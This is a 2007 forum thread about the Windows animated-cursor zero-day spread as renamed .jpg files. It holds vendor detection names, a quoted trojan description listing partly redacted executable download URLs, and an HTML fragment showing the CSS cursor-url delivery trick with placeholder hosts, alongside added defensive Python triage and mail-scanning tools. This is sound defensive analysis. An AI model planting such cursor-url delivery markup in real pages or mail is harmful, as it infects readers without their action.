[Warning] Zero-Day Attack Appears in Taiwan - PCZONE Forum


Member
[Warning] Zero-Day Attack Appears in Taiwan
Among the samples analysed recently, a few were very strange. Last night I took a quick look at their file format and found that they were Animated Cursor (*.ani) files, but named *.jpg. This morning a friend told me that Microsoft had published a security vulnerability (Vulnerability in Windows Animated Cursor Handling), and it suddenly clicked: this is a zero-day attack.

So far, the following antivirus products detect these malicious files:

ANI_attack-all/1.jpg:
[ Kaspersky ], “Trojan-Downloader.Win32.Ani.g”
[ McAfee ], “Exploit-ANIfile.c”
ANI_attack-all/2.jpg:
[ Kaspersky ], “Trojan-Downloader.Win32.Ani.g”
[ McAfee ], “Exploit-ANIfile.c”
ANI_attack-all/7888p.jpg:
[ Kaspersky ], “Trojan-Downloader.Win32.Ani.g”
[ McAfee ], “Exploit-ANIfile.c”
ANI_attack-all/9197p.jpg:
[ Kaspersky ], “Trojan-Downloader.Win32.Ani.g”
[ McAfee ], “Exploit-ANIfile.c”
ANI_attack-all/da.jpg:
[ Kaspersky ], “Trojan-Downloader.Win32.Ani.g”
[ McAfee ], “Exploit-ANIfile.c”

For details, see the post “台灣出現零時差攻擊 (Zero-Day Attack)” (Zero-Day Attack Appears in Taiwan).

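An added example (not code from the original post or from any of the vendors quoted in this thread) of how to triage samples like the ones described above. It walks the RIFF structure of each file, reports when a file named *.jpg is really a RIFF/ACON animated cursor, and flags any anih chunk whose declared size is not the 36 bytes of the ANIHEADER structure, which is the condition the animated-cursor flaw covered by Security Advisory 935423 failed to enforce on every anih chunk. The sample files are constructed inline; the 0x200-byte second header is an illustrative value, not taken from the real samples.

```python
"""Triage helper for the samples described above: files named *.jpg that
are really RIFF/ACON animated cursors.

Added example, not code from the original post or from any vendor quoted
here.  Two checks:
  1. content/extension mismatch: a '.jpg' whose bytes start 'RIFF....ACON';
  2. any 'anih' chunk whose declared size is not 36, the size of the
     ANIHEADER structure (cbSize plus eight DWORDs).  The Windows flaw in
     Security Advisory 935423 copied an over-long anih chunk into that
     fixed-size structure, so any other size is worth flagging.
All sample bytes below are constructed for the demonstration.
"""
import struct

ANIHEADER_SIZE = 36  # sizeof(ANIHEADER): 9 little-endian DWORDs


def riff_chunks(data, offset, end):
    """Yield (fourcc, payload_offset, declared_size) for each chunk header
    in data[offset:end].  Does not recurse into LIST chunks."""
    while offset + 8 <= end:
        fourcc = data[offset:offset + 4]
        (size,) = struct.unpack_from("<I", data, offset + 4)
        yield fourcc, offset + 8, size
        offset += 8 + size + (size & 1)  # RIFF chunks are word-aligned


def _walk(data, offset, end, findings, depth=0):
    for fourcc, payload, size in riff_chunks(data, offset, end):
        if payload + size > end:
            findings.append(f"chunk {fourcc!r} at offset {payload - 8} "
                            f"declares {size} bytes and overruns the file")
            return
        if fourcc == b"anih" and size != ANIHEADER_SIZE:
            findings.append(f"anih at offset {payload - 8} declares {size} bytes "
                            f"(expected {ANIHEADER_SIZE}), nesting depth {depth}")
        elif fourcc == b"LIST":
            # LIST payload is a 4-byte list type followed by sub-chunks;
            # a crafted file can hide a second anih in there, so recurse.
            _walk(data, payload + 4, payload + size, findings, depth + 1)


def triage(name, data):
    """Return a list of findings for one file; an empty list means the
    content matches the name and every anih header is the expected size."""
    findings = []
    if not (data[:4] == b"RIFF" and data[8:12] == b"ACON"):
        return findings  # not an animated cursor at all
    if not name.lower().endswith(".ani"):
        findings.append(f"{name}: extension says image, content is a RIFF/ACON animated cursor")
    _walk(data, 12, len(data), findings)
    return findings


# ---- constructed samples -------------------------------------------------
def chunk(fourcc, payload):
    pad = b"\0" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def build_ani(top_level_anih, list_anih=()):
    """Constructed RIFF/ACON file: top-level anih chunks, optionally followed
    by a LIST 'fram' chunk wrapping further anih chunks."""
    body = b"".join(chunk(b"anih", p) for p in top_level_anih)
    if list_anih:
        body += chunk(b"LIST", b"fram" + b"".join(chunk(b"anih", p) for p in list_anih))
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"ACON" + body


# cbSize, cFrames, cSteps, cx, cy, cBitCount, cPlanes, JifRate, flags
GOOD_HEADER = struct.pack("<9I", 36, 1, 1, 0, 0, 32, 1, 10, 1)
BENIGN = build_ani([GOOD_HEADER])
# valid first header, then an over-long second anih (0x200 bytes is illustrative)
MALFORMED = build_ani([GOOD_HEADER, b"A" * 0x200])
MALFORMED_NESTED = build_ani([GOOD_HEADER], [b"A" * 0x200])

if __name__ == "__main__":
    for name, data in [("1.jpg", BENIGN), ("2.jpg", MALFORMED),
                       ("da.jpg", MALFORMED_NESTED), ("photo.jpg", b"\xff\xd8\xff\xe0")]:
        print(name, triage(name, data) or ["ok"])
```

Run it over a directory of suspect files by replacing the constructed list with `open(path, "rb").read()`; a real JPEG returns no findings, a renamed cursor returns the extension finding, and a cursor carrying an over-long anih chunk at any nesting depth returns a second finding with its offset.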
Member
Re: [Warning] Zero-Day Attack Appears in Taiwan
Does this also affect Firefox users?
Member
Re: [Warning] Zero-Day Attack Appears in Taiwan
Quote:
Originally posted by hn1271n
Does this also affect Firefox users?
From the look of it, it is written in VBScript, so Firefox should not be affected.
Member
Re: [Warning] Zero-Day Attack Appears in Taiwan
Quote:
Originally posted by hertw
From the look of it, it is written in VBScript, so Firefox should not be affected.
Firefox doesn't seem to support the ani syntax either.
Member
Re: [Warning] Zero-Day Attack Appears in Taiwan
McAfee published the Exploit-ANIfile.c definition on 3/28; for details see
http://tw.mcafee.com/virusInfo/defau...virus_k=141860

Kaspersky published the Trojan-Downloader.Win32.Ani.g definition on 3/30; no detailed information is available yet
http://www.viruslist.com/en/find?sea....Ani.g&x=0&y=0

Symantec (Norton) published the Bloodhound.Exploit.131 definition on 3/30; for details see
http://www.symantec.com/enterprise/s...300308-3019-99
VirusTotal test of sample 1
Member
Re: [Warning] Zero-Day Attack Appears in Taiwan
Trend Micro detailed description: http://www.trendmicro.com/vinfo/zh-t...5FANICMOO%2EAX

-------------------------------------------------------------------------------------------- The following information is taken from the "Trend Micro Threat Encyclopedia (Taiwan)" (趨勢科技網路安全百科(台灣))

Malware type: Trojan
Alias: No Alias Found
In the wild: Yes
Destructive: No
Language: English
Platform: Windows XP
Encrypted: No
Overall risk rating: Low

--------------------------------------------------------------------------------

Reported infections: Low
Damage potential: Medium
Distribution potential: Low



--------------------------------------------------------------------------------


Description:



To get a one-glance comprehensive view of the behavior of this malware, refer to the Behavior Diagram shown below.



Malware Overview

This Trojan may arrive on a system as a specially crafted animated cursor (.ANI) file downloaded from the Internet by unsuspecting users. It may also be delivered to a system via a specially crafted HTML email message.

It takes advantage of a vulnerability in the way Windows handles animated cursor files (.ANI). More information regarding this flaw can be found on the following Microsoft Web page:

Security Advisory 935423
It uses the said vulnerability to download and execute files from several URLs. One of the downloaded files is detected by Trend Micro as TROJ_SMALL.DRF. As a result, routines of the downloaded Trojan may also be exhibited on the affected system.





Minimum scan engine version: 8.000

Pattern file needed: 4.375.00

Pattern release date: Mar 28, 2007



--------------------------------------------------------------------------------

Solution:




Important Windows XP Cleaning Instructions

Users running Windows XP must disable System Restore to allow full scanning of infected computers.

Users running other Windows versions can proceed with the succeeding solution set(s).

Running Trend Micro Antivirus

If you are currently running in safe mode, please restart your computer normally before performing the following solution.

Scan your computer with Trend Micro antivirus and delete files detected as TROJ_ANICMOO.AX and TROJ_SMALL.DRF. To do this, Trend Micro customers must download the latest virus pattern file and scan their computer. Other Internet users can use HouseCall, the Trend Micro online virus scanner.

Note: As of this writing, there is no available patch for the Windows vulnerability that this malware exploits. Trend Micro recommends checking the Microsoft Web site for the latest patches and updates.





Memory resident: No

Size of malware: 794 Bytes

Initial samples received: Mar 28, 2007

Related: TROJ_SMALL.DRF


--------------------------------------------------------------------------------

Payload 1: Downloads files


--------------------------------------------------------------------------------



--------------------------------------------------------------------------------

Details:



This Trojan may arrive on a system as a specially crafted animated cursor (.ANI) file downloaded from the Internet by unsuspecting users. It may also be delivered to a system via a specially crafted HTML email message.

It takes advantage of a vulnerability in the way Windows handles animated cursor files (.ANI). More information regarding this flaw can be found on the following Microsoft Web page:

Security Advisory 935423
It uses the said vulnerability to download and execute files from the following URLs:

http://220.71.{BLOCKED}.189/wincf.exe - detected as TROJ_SMALL.DRF
http://{BLOCKED}yadsfdg.biz/adv/014/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/102/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/109/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/110/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/113/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/114/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/133/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/134/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/139/
http://{BLOCKED}yadsfdg.biz/adv/139/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/147/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/152/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/153/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/159/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/161/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/163/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/165/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/169/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/171/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/176/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/177/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/180/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/185/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/186/win32.exe
http://{BLOCKED}yadsfdg.biz/adv/198/win32.exe
http://www.{BLOCKED}vmtek.com/2/11.exe
http://www.{BLOCKED}crcmedia.net/exe/flash.exe
http://www.{BLOCKED}softhelp.com/update.exe
As a result, routines of the downloaded files may also be exhibited on the affected system.

This Trojan runs on Windows XP.
Member
Re: [Warning] Zero-Day Attack Appears in Taiwan
Another VT test
Member
Re: [Warning] Zero-Day Attack Appears in Taiwan
Viruses really do change by the day;
it's impossible to guard against them all.

Member
Re: [Warning] Zero-Day Attack Appears in Taiwan
It's not VBScript, and it isn't any special syntax either. The problematic HTML source I've seen roughly contains:
<DIV style="CURSOR: url('http://xxxx.xxx.xxx.xxx/xxxx.jpg')">
<DIV style="CURSOR: url('http://xxx.xxx.xxx.xxx/yyyy.jpg')"></DIV></DIV>
Very scary: you get the Trojan just by opening the mail, without clicking any attachment, and nothing looks wrong from the outside.
The antivirus vendors actually consider it low risk; I think many compromised web pages will be changed to use this technique.
I just hope Microsoft releases a fix quickly.
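An added example, not part of the original thread, of a scanner for the delivery technique the post above describes: a CSS `cursor: url(...)` declaration in an HTML mail body that makes the Windows renderer fetch and parse a remote animated cursor as soon as the message is displayed. The message it scans is constructed here; its body is quoted-printable encoded, as the `style=3D` and `DIV=20` in the poster's paste show theirs was, so transfer encoding is undone before matching. The hosts in it are documentation addresses, not the real download servers.

```python
"""Scanner for the delivery technique shown in the post above: a CSS
'cursor: url(...)' declaration in an HTML e-mail, which makes the Windows
renderer fetch and parse a remote animated cursor as soon as the message
is displayed, with no attachment to click.

Added example, not part of the original thread.  The message below is
constructed.  Its body is quoted-printable, as the 'style=3D' / 'DIV=20'
in the poster's paste shows theirs was, so the body is decoded before
matching; decode_pasted_fragment() does the same for a bare fragment
copied out of a raw message.
"""
import quopri
import re
from email import message_from_bytes
from email.policy import default

# cursor declaration, any leading keywords, then the first url(...) argument
CURSOR_URL = re.compile(
    r"cursor\s*:\s*[^;}]*?url\(\s*['\"]?\s*([^'\")\s]+)",
    re.IGNORECASE,
)


def decode_pasted_fragment(text):
    """Undo quoted-printable on a fragment pasted from a raw mail source."""
    return quopri.decodestring(text.encode("latin-1")).decode("latin-1")


def cursor_urls(html):
    """Every URL referenced by a CSS cursor declaration in the markup."""
    return CURSOR_URL.findall(html)


def remote_cursor_urls(html):
    """Only cursor URLs that fetch from another host.  A .jpg or .gif name
    is no reason to skip one: the samples in this thread were ANI files
    renamed to .jpg."""
    return [u for u in cursor_urls(html)
            if u.lower().startswith(("http://", "https://", "//"))]


def scan_message(raw):
    """Return the remote cursor URLs found in every text/html part of a
    raw RFC 822 message, after transfer encoding is undone."""
    msg = message_from_bytes(raw, policy=default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            hits.extend(remote_cursor_urls(part.get_content()))
    return hits


# constructed message; 203.0.113.0/24 is documentation address space
SAMPLE_MAIL = b"""\
From: sender@example.invalid
To: victim@example.invalid
Subject: photos
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html><body>
<DIV style=3D"CURSOR: url('http://203.0.113.10/images/7888p.jpg')">
<DIV=20 style=3D"CURSOR: url('http://203.0.113.11/9197p.jpg')"></DIV></DIV>
<p>Nothing to see here.</p>
</body></html>
"""

if __name__ == "__main__":
    for url in scan_message(SAMPLE_MAIL):
        print("remote cursor:", url)
```

Matching on the decoded body matters: a filter that looks for `cursor:` in the raw quoted-printable text misses a declaration split by a soft line break or spelled `CURSOR=3A`, while this scanner sees the markup the mail client actually renders. The URLs it returns are what to feed into the file triage step (fetch in a sandbox, then check whether the "image" is a RIFF/ACON file).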
Member
Re: [Warning] Zero-Day Attack Appears in Taiwan
On another site (360安全衛士, 360Safe) I saw that there is an update, but it wasn't released by MS, so I'm not sure whether I should download and install it?


This post was edited by huseinma on 2007-04-02 02:20 PM.